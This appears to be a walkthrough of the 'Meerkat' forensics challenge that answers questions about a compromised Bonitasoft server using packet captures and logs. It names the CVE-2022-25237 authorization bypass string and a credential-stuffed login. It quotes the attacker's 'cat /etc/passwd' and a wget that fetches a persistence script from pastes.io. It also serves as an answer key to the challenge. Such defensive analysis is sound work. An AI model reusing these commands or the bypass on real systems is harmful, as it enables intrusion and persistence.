Reading Time: 5 minutes

Introduction to Meerkat Challange

I want to share some tips for approaching the Meerkat challenge.

Sherlock Scenario on Meerkat

A zip file has been provided, containing a .pcap file that captures network traffic from the timeframe of the suspected compromise. Additionally, a .json file is included, recording security events from the same period.

Tools use for Meerkat Sherlock Challange

PCAP data is most commonly analyzed with Wireshark.

For log data analysis, there are several options available, with jq being an excellent choice for parsing raw JSON data.

Question of the Meerkat Sherlock

We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running

The request “GET /bonita HTTP/1.1” points to the Bonitasoft Business Process Management Software. This provides insight into the organisation’s platform and serves as a starting point for identifying any potential exploited vulnerabilities.

Answer: BonitaSoft

We believe the attacker may have used a subset of the brute forcing attack category – what is the name of the attack carried out?

The consistent traffic from a single IP address and its rapid submission rate strongly suggest a brute-force attack. More specifically, the use of predefined credential pairs, rather than testing multiple usernames with one password or one username with multiple passwords, indicates this is a credential-stuffing attack.

Answer: Credential Stuffing

Does the vulnerability exploited have a CVE assigned – and if so, which one?

Turning our attention to the JSON file, we can identify alerts associated with the attack by searching for “Login” events. This search quickly provides a strong lead, identifying CVE-2022–25237 in the logs.

Answer: CVE-2022-25237

Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit? (No special characters)

What is CVE-2022-25237?

CVE-2022–25237 impacts Bonita Web 2021.2 and involves an authentication and authorization bypass vulnerability. The root cause lies in an overly broad exclude pattern within the RestAPIAuthorizationFilter. By appending ;i18ntranslation or /../i18ntranslation/ to a URL, unauthorized users can gain access to privileged API endpoints. This can be leveraged to execute privileged actions, potentially resulting in remote code execution.

Answer: i18ntranslation

How many combinations of usernames and passwords were used in the credential-stuffing attack?

To analyze the PCAP, I applied the filter http.request.uri, which typically displays one packet per HTTP request along with the corresponding endpoint in the info field. The first 117 packets are from IP addresses 156.146.62.213 to 172.31.6.44, now confirmed as Forela’s Bonitasoft server. Within this stream, we observe multiple POST requests, each resulting in a 401 response code, indicating invalid credentials. In total, 56 unique username-password combinations were attempted during this activity.

Answer: 56

Which username and password combination was successful?

Upon analyzing the PCAP file, we see a login attempt using the username “seb.broom@forela.co.uk” and the password “g0vernm3nt,” which returns an HTTP code 204, indicating successful authentication. Additionally, the requests include a User-Agent string from the Python requests library, which implies they are likely from a script, fitting the pattern of a brute-force attack.

Answer: seb.broom@forela.co.uk:g0vernm3nt

If any, which text-sharing site did the attacker utilise?

At this point, the attacker’s IP address changes from 156.146.62.213 to 138.199.59.221.

However, it’s reasonable to assume that this is the same attacker or at least someone linked to the original attacker, as they resume the attack within one minute of the initial brute force attack’s conclusion. The attacker uses the compromised credentials to log back in, re-upload the rce_api_extension.zip file, configure it as before, and execute another set of commands via a GET request. This time, they run “cat /etc/passwd” to enumerate all user accounts on the web server, along with details for each. Once again, the attacker deletes the zip file to erase evidence.

A new action occurs here. The attacker uploads the zip file again as before and issues a GET request, but this time the command is “wget https://pastes.io/raw/bx5gcr0et8.”

Answer: pastes.io

Please provide the filename of the public key used by the attacker to gain persistence on our host.

I have the URL for the downloaded script, and it may still be accessible as shown above. Upon reviewing the previously analyzed file, we can see that the new SSH key was appended to the list of keys in /home/ubuntu/.ssh/authorized_keys.

Answer: hffgra4unv

Can you confirmed the file modified by the attacker to gain persistence?

The answer to question 9 appears above.

Answer: /home/ubuntu/.ssh/authorized_keys

Can you confirm the MITRE technique ID of this type of persistence mechanism?

The MITRE ATT&CK ID for Account Manipulation via SSH Authorized Keys is T1098.004 (Task 10). Reviewing MITRE’s ATT&CK Matrix, we can identify a TTP that aligns with the attacker’s actions: SSH Authorized Keys (T1098.004), categorized under Account Manipulation in the Persistence column.

Answer: T1098.004